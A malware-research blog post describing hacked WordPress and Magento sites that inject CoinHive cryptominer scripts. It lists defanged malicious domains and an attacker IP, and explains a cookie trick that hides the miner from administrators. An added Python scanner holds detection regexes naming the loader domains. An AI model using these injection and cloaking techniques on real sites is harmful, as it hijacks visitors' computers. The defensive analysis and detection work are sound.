Hacked Websites Mine Cryptocurrencies

Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICOs, mining farms, skyrocketing exchange rates: you see or hear about this every day in the news. Everyone seems to be trying to jump on the bandwagon.

This trend resulted in the emergence of online platforms that allow webmasters to install coin miners on their websites as an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for websites are JSE Coin and Coinhive.

Controversy Around JavaScript Miners

Both of these platforms allow webmasters to register and obtain a snippet of JavaScript code that they can install on their sites. This code works in the background of visitors' browsers, mining coins using the "excess" CPU power of their computers.

In this blog post we will not discuss whether this is a good alternative to banner ads, nor whether your computer really has "excess CPU power" that the websites you visit are entitled to drain. This is what happens when you visit a site with the CoinHive JavaScript miner:

Visitor's laptop CPU usage

For example, many visitors of The Pirate Bay immediately noticed when it began testing such an online miner. It's a no-brainer that ad blockers will soon start blocking JavaScript miners too.

Like any other type of website monetization, this one is prone to abuse, especially in its early stages. It didn't take long for us to encounter the CoinHive miner installed on hacked sites. It's a natural move for bad actors who already abuse other legitimate means of website monetization, for example by installing their own ad or affiliate codes on third-party sites.

Malicious Injection with CoinHive Miner

In this case, a webmaster contacted us and said that some of their site visitors had noticed high processor usage while visiting the site. Some of them even identified the CoinHive cryptominer there. Indeed, the HTML code of the web pages contained this code in the footer section:

That security.fblaster[.]com script loaded the CoinHive miner script:

CoinHive miner on security.fblaster[.]com

This is not the official way to use the CoinHive miner (which is supposed to be loaded from lib/coinhive.min.js on CoinHive's own site), but if you check the very first long line of the "security.fblaster[.]com" script you'll see that it is identical to CoinHive's own coinhive.min.js. The rest of the lines are the part that initializes the miner with the attacker's site key and starts it on page load.

Security.fblaster[.]com Malware

We searched for security.fblaster[.]com and found very similar injections on a few other sites:

  • hxxp://security.fblaster[.]com/sidebar.js?id=1
  • hxxp://security.fblaster[.]com/slider.js?id=1
  • hxxp://security.fblaster[.]com/widgets.js?id=1

The script names are chosen to look legitimate so that the webmaster doesn't get alarmed when seeing them. Moreover, a couple of the sites we investigated had the domain names of the infected sites referenced within the malicious script, making it look even more as if it belonged on those sites.

Those scripts have already been removed from most of the infected sites, but one site still had the live script, and it loaded the same cryptominer with a different site key: XMzUIs3Jx7qkRuPPfxG4I5k4AdXfQV6D.

Cryptominer Re-uses Old Infection

We checked the infected sites on the Wayback Machine and traced the injection back to the end of 2016. We also noticed that the IP address of the "security.fblaster[.]com" server (178.62.224.14, DigitalOcean Amsterdam) was mentioned in a tweet about attacks that attempted to exploit the RevSlider vulnerability:

#RevSlider #soaksoak #malware attempts from 178.62.224.14 (NL) ../wp-config.php

That was strange, considering that CoinHive didn't even exist back then. According to WHOIS, coin-hive.com (the domain that is hard-coded inside the JavaScript miner) was registered just a month ago, on August 24th, 2017.

Moreover, on the site whose webmaster contacted us, the script was only injected on September 19th, 2017 (confirmed by Google's cache). We also noticed that on this site the script had a long number in the ?id= parameter that changed on every page load, while in the scripts on the other sites it was always ?id=1.

It appears that this is not a new infection. Since the attackers already control the "security.fblaster[.]com" server, they can easily modify the malicious script without having to change anything on the sites they infected previously.

Once the hackers learned about CoinHive, they registered for the service (it only asks for a valid email address) and ported the JavaScript miner to load from their own domain, effectively reusing the scripts they had already injected into compromised sites.

Since a cryptocurrency miner only produces meaningful results on sites with lots of visitors (or on a large number of less popular sites), they began injecting the miner into new sites just a few days ago. At this point the security.fblaster[.]com infection is not massive (although there are other similar attacks, as you'll read below), as we don't see it on many other sites, so most likely the attackers are still testing this approach.

Infected Files on WordPress

Now let's see how this infection works on the server. A quick scan revealed modified core WordPress files.

The first modification was found at the top of wp-admin/admin-header.php:

This line of code sets the wpt cookie for 100 years (!) for WordPress users who log into the admin interface.

The next file is wp-includes/general-template.php, with a modified wp_footer() function:

This function is responsible for generating the footer section of web pages. The hackers extended it with a call to code from wp-includes/options-footer.php, which, by the way, is not a legitimate part of WordPress.

Let's take a look inside the malicious options-footer.php file:

Source code of options-footer.php

As you can see, this file injects the security.fblaster[.]com script (the CoinHive miner) into the footer of web pages, effectively abusing all visitors who are not known site users (i.e. who don't have the wpt cookie). This is also why the site owner never saw the miner: anyone who has logged into the admin interface carries the cookie and gets a clean page.

This code also answers why we saw a long number in the ?id= parameter of the injected script, and why it changed on every page load. It is simply a timestamp generated by PHP's time() function.
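The script below is an added example, not Sucuri's tooling and not code from the original post. It turns the indicators described in this section (and in the Magento case further down) into a scanner you can run over served HTML, PHP files or database values, and it adds an allowlist check on external script hosts so that a loader on a domain no signature knows about still shows up. The sample footer, Magento config value and allowlist are constructed for the example; because the miner is only served to visitors without the wpt cookie, fetch the page you feed to it without any cookies, not from an admin session.

```python
"""Signature and allowlist checks for the cryptominer injection described above.
Added example; not Sucuri's tooling.  Sample inputs are constructed, not copies
of the real injected code."""
import re
from urllib.parse import urlparse

# Indicators from the cases in this post plus the API names the official
# coinhive.min.js exposes (CoinHive.Anonymous / CoinHive.User).
INDICATORS = {
    "fblaster-loader": re.compile(r"security\.fblaster\.com/\w+\.js", re.I),
    "camillesanz-loader": re.compile(r"camillesanz\.com/lib/status\.js", re.I),
    "coinhive-api": re.compile(r"coin-hive\.com|CoinHive\.(?:Anonymous|User)", re.I),
    # "?id=<10-digit unix time>": what time() in options-footer.php produces
    "timestamp-cache-buster": re.compile(r"\.js\?id=\d{10}\b"),
    # WordPress does not ship wp-includes/options-footer.php
    "bogus-core-include": re.compile(r"wp-includes/options-footer\.php"),
    # the cookie that marks logged-in users so the miner skips them
    "wpt-cookie": re.compile(r"setcookie\(\s*['\"]wpt['\"]", re.I),
}

SCRIPT_SRC = re.compile(r"<script\b[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def scan_text(source, text):
    """Return one finding per (indicator, line) hit in `text`.
    Works for served HTML, PHP files and database values alike."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                findings.append({"source": source, "indicator": name,
                                 "line": lineno, "text": line.strip()})
    return findings


def foreign_script_hosts(html, allowed_hosts):
    """Hosts of external <script src> tags that are not on the allowlist.
    This catches a loader domain that no signature knows about yet."""
    hosts = set()
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            hosts.add(host.lower())
    return sorted(hosts)


# --- constructed sample inputs ---------------------------------------------
# Footer of a page fetched WITHOUT the wpt cookie (a logged-in admin would not
# see the injection at all).
WP_FOOTER = """<div id="footer">...</div>
<script src="http://security.fblaster.com/sidebar.js?id=1505865431"></script>
</body></html>"""

# Value of design/head/includes from Magento's core_config_data table.
MAGENTO_HEAD_INCLUDES = ('<script type="text/javascript" '
                         'src="https://camillesanz.com/lib/status.js"></script>')

# A page with only first-party and allowlisted scripts.
CLEAN_PAGE = """<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>"""

SITE_ALLOWLIST = {"www.google-analytics.com"}


def demo():
    """Run both checks over the samples and return the combined report."""
    return {
        "wp_footer": scan_text("wp footer", WP_FOOTER),
        "magento": scan_text("core_config_data design/head/includes",
                             MAGENTO_HEAD_INCLUDES),
        "clean": scan_text("clean page", CLEAN_PAGE),
        "unknown_hosts": foreign_script_hosts(
            WP_FOOTER + MAGENTO_HEAD_INCLUDES + CLEAN_PAGE, SITE_ALLOWLIST),
    }


if __name__ == "__main__":
    for section, result in demo().items():
        print(section, result)
```

The signature list is only as good as the last case you saw, which is why the allowlist check is there: an attacker can move the loader to a new domain without touching the infected sites, as this one did, but they cannot make it first-party or allowlisted.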

Injected CoinHive Miner on Magento

By the time we finished cleaning this site, my colleague Douglas Santos, who was working on a different site, found another type of injected cryptominer script. It was the same CoinHive JavaScript miner, but this time the code was injected into the database of a Magento site (the design/head/includes value in the core_config_data table).

The injected remote script was different:

CoinHive miner in the Magento database

The source of the script, hxxps://camillesanz[.]com/lib/status.js, is also a version of CoinHive's own coinhive.min.js, but this time it is obfuscated ("encrypted") and looks like this:

Obfuscated CoinHive miner inside status.js

In this case the attacker decided to host the script on a hacked third-party site and went the extra mile to obfuscate it, which suggests far more serious intentions for this attack than in the case of security.fblaster[.]com.

In this case the database injection coexists with an older, massive Magento infection that injected redirect scripts like:

  • hxxps://africangrey[.]top/redirect_base/redirect.js
  • hxxp://alemoney[.]xyz/js/stat.js
  • hxxp://africangirl[.]top/redirect_base/redirect.js
  • hxxp://ribinski[.]us/redirect_base/redirect.js
  • hxxps://aleinvest[.]xyz/js/theme.js

It Escalated Quickly

The next morning we received this email:

Themes and plugins are being exploited to mine Monero coin and sucking a lot of CPU.

Manually cleaned 20+ sites today.

We are still waiting for details on this case, so stay tuned for updates.

Conclusion

One thing is clear: the release of JavaScript coin miners for websites did not go unnoticed by the bad guys. They immediately began looking for ways to abuse them, and we expect to see mass infections switching their attention to cryptominers instead of traditional types of malicious payloads, and not just on WordPress and Magento.

While cryptocurrency miners for websites are a very new thing, there is nothing new in the approaches hackers use to abuse them. If something can be installed on a website and monetized, hackers will do it on the websites they compromise. Thus one of the best security practices for webmasters is to monitor the integrity of their sites.

For WordPress infections like this, you can use our step-by-step guide on how to identify a hack and clean a compromised WordPress site. We also have a similar guide that will help owners of Magento sites.

If you need immediate help with this type of infection, we offer affordable website security plans.

About Denis Sinegubko

Denis is the founder of Unmask Parasites and a Senior Malware Researcher at Sucuri. Follow him on Twitter at @unmaskparasites.

Comments

That's good, I am glad that you identified the exploit, the exact file that they are using. Protecting with 400 permission will do the job for now. But I think some plugin authors are using it to earn some revenue by injecting them in their plugin updates. I have found some of those, though I don't want to disclose them publicly. WordPress should bring some #Hotfix again to prevent this core file #Exploit. It's messy when you have to replace the core file again and again.

I wish there were a good way to use this technology: it has the potential to give websites some revenue without flooding everything with ads and popups. Imagine an internet experience without ads? ..that would be something!

I think that users should be able to choose if they want to have ads all over the place or, instead, give some CPU usage while they are enjoying a website's content.

That is more expensive for users; just imagine what it would be like for mobile, tablet, and laptop users whose devices use batteries for power. Even desktop users would see more heat, noise, and higher electric bills.

JavaScript miners don't have to run at 100%, it's up to the dev to set it. Anyway, the options could be left in the hands of the end users, maybe even at a browser level (or with browser plugins like ad-blockers): block ads and allow some resources for JS miners, or vice versa.

Content creators' websites need some income, one way or the other. The lack of it will cause a continuous decline in the quantity and quality of their content. Users should be able to choose what is less intrusive for them.
